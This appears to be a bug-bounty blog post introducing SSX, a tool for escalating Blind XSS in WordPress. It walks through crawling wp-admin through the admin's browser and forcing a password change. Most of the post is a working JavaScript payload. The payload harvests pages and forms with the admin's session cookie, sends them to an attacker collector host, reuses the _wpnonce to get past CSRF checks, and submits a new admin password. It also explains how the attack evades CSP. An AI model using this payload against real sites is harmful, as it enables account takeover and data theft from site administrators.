Assalamualaikum Warohmatullahi Wabarokatuh (peace be upon you, and God's mercy and blessings) :)
Hello, it's been a long time since I last shared a story.
This time I want to share a tool I built myself. I usually use it on pentest projects, but it also works for bug bounty programs, where it can raise the severity of a finding.
You may have heard of or used xsshunter, ezxss and similar frameworks for exploiting XSS / Blind XSS; SSX is the next step after those frameworks.
Some of us, including myself, often stop when we get a Blind XSS finding because we don't know what else to do, even though it would be much better to exploit it further first.
You can use the SSX tool that I use myself, but don't install it on a production server: I haven't implemented any security for the tool itself, and I'm also not good at coding.
Image 1: How SSX works

This is an example of exploiting XSS in the WordPress CMS with SSX, but it usually works on other CMSes as well.
1. SSX sends back every link on the page where the XSS fires, so you first need a valid XSS whose payload actually executes in the victim's browser.
2. From those links we can crawl further by clicking [crawl] on a target page. In this example I click the [crawl] button for /wp-admin/post.php?post=3&action=edit; the XSS payload fetches that page without any admin interaction, and we get more links from it.
3. The next step is to get the password-change form: click the [get forms] button on the /wp-admin/profile.php link, and the forms on that page appear on the SSX dashboard.
4. Fill in the new password and click Force Submit; SSX then makes the admin's browser submit the form, changing the password. For a demo, see the video below:
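The four steps above, as an added example in JavaScript that is not SSX's own code: the payload side of a Blind XSS post-exploitation tool, which harvests links and forms from wp-admin pages using the admin's own session and builds the exact request Force Submit sends. The collector URL, the blog.example host and the sample profile-page HTML are assumptions constructed for the demo; the wp-admin paths and the form field names (_wpnonce, action=update, user_id, pass1, pass2) follow WordPress's real profile form.

```javascript
// Added example, not SSX's own code: what the workflow above needs a Blind
// XSS payload to do once it fires in a WordPress admin's browser. COLLECTOR
// is a hypothetical attacker endpoint; the wp-admin paths are WordPress's
// real ones, but the sample page HTML at the bottom is constructed.
const COLLECTOR = "https://collector.example/report"; // assumption

// Resolve an href/action against the page it was found on.
const absolutize = (href, base) => { try { return new URL(href, base).href; } catch { return null; } };

// Read one attribute out of a tag's attribute string (double-, single- or unquoted).
function attr(attrs, name) {
  const m = attrs.match(new RegExp(`\\b${name}\\s*=\\s*("([^"]*)"|'([^']*)'|([^\\s>]+))`, "i"));
  return m ? (m[2] ?? m[3] ?? m[4]) : null;
}

// Steps 1 and 2: every <a href> on a page, absolute and de-duplicated. Regex rather
// than DOM so it also runs under Node; in the browser document.links would do.
function extractLinks(html, baseUrl) {
  const links = new Set();
  for (const m of html.matchAll(/<a\b([^>]*)>/gi)) {
    const raw = attr(m[1], "href");
    if (!raw || raw.startsWith("#") || /^javascript:/i.test(raw)) continue;
    const abs = absolutize(raw, baseUrl);
    if (abs) links.add(abs);
  }
  return [...links];
}

// Step 3: every <form> with action, method and current field values, for the dashboard.
// Hidden fields (WordPress's _wpnonce among them) are kept: wp-admin rejects a submit without one.
function extractForms(html, baseUrl) {
  const forms = [];
  for (const f of html.matchAll(/<form\b([^>]*)>([\s\S]*?)<\/form>/gi)) {
    const fields = {};
    for (const i of f[2].matchAll(/<(?:input|select|textarea)\b([^>]*)>/gi)) {
      const name = attr(i[1], "name");
      if (name) fields[name] = attr(i[1], "value") ?? "";
    }
    forms.push({
      action: absolutize(attr(f[1], "action") ?? "", baseUrl),
      method: (attr(f[1], "method") ?? "GET").toUpperCase(),
      fields,
    });
  }
  return forms;
}

// Step 4: overlay the attacker's values on the harvested fields and build the
// request the browser would send had the admin clicked Submit.
function buildSubmission(form, overrides) {
  const body = new URLSearchParams({ ...form.fields, ...overrides }).toString();
  const init = { method: form.method, credentials: "include" }; // admin's session cookie
  if (form.method === "GET") return { url: `${form.action}?${body}`, init };
  init.headers = { "Content-Type": "application/x-www-form-urlencoded" };
  init.body = body;
  return { url: form.action, init };
}

// Browser-only side. Same-origin fetch carrying the session cookie is why
// [crawl] and Force Submit need no admin interaction; the cross-origin report
// to COLLECTOR goes out no-cors with its response ignored.
async function crawl(url) {
  const html = await (await fetch(url, { credentials: "include" })).text();
  const result = { url, links: extractLinks(html, url), forms: extractForms(html, url) };
  await fetch(COLLECTOR, { method: "POST", mode: "no-cors", body: JSON.stringify(result) });
  return result;
}
async function forceSubmit(form, overrides) {
  const { url, init } = buildSubmission(form, overrides);
  return (await fetch(url, init)).status;
}

// Constructed stand-in for /wp-admin/profile.php (real field names, fake values).
const BASE = "https://blog.example/wp-admin/profile.php";
const SAMPLE_PROFILE_HTML = `
<a href="/wp-admin/">Dashboard</a>
<a href='post.php?post=3&action=edit'>Edit post</a>
<a href="#profile">skip</a>
<a href="/wp-admin/">Dashboard</a>
<form id="your-profile" action="profile.php" method="post">
  <input type="hidden" name="_wpnonce" value="9f3e1c2a77">
  <input type="hidden" name="action" value="update">
  <input type="hidden" name="user_id" value="1">
  <input type="password" name="pass1" value="">
  <input type="password" name="pass2" value="">
  <input type="submit" name="submit" value="Update Profile">
</form>`;

// Offline walk-through of steps 2-4 on the sample page: what the dashboard receives, and the request Force Submit sends.
function demo() {
  const forms = extractForms(SAMPLE_PROFILE_HTML, BASE);
  return {
    links: extractLinks(SAMPLE_PROFILE_HTML, BASE),
    forms,
    submission: buildSubmission(forms[0], { pass1: "N3wP@ss!", pass2: "N3wP@ss!" }),
  };
}
```

In the browser the payload calls crawl() for each page the dashboard asks for and forceSubmit() with the harvested form plus the attacker's values. The harvested _wpnonce is what gets the request past WordPress's CSRF check, which is why the form has to be read from a live admin page rather than typed in by hand. A Content-Security-Policy with a restrictive connect-src would block the report to COLLECTOR, but not the same-origin crawl or the forced submit.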
Github: https://github.com/dimazarno/SSX
Happy hunting!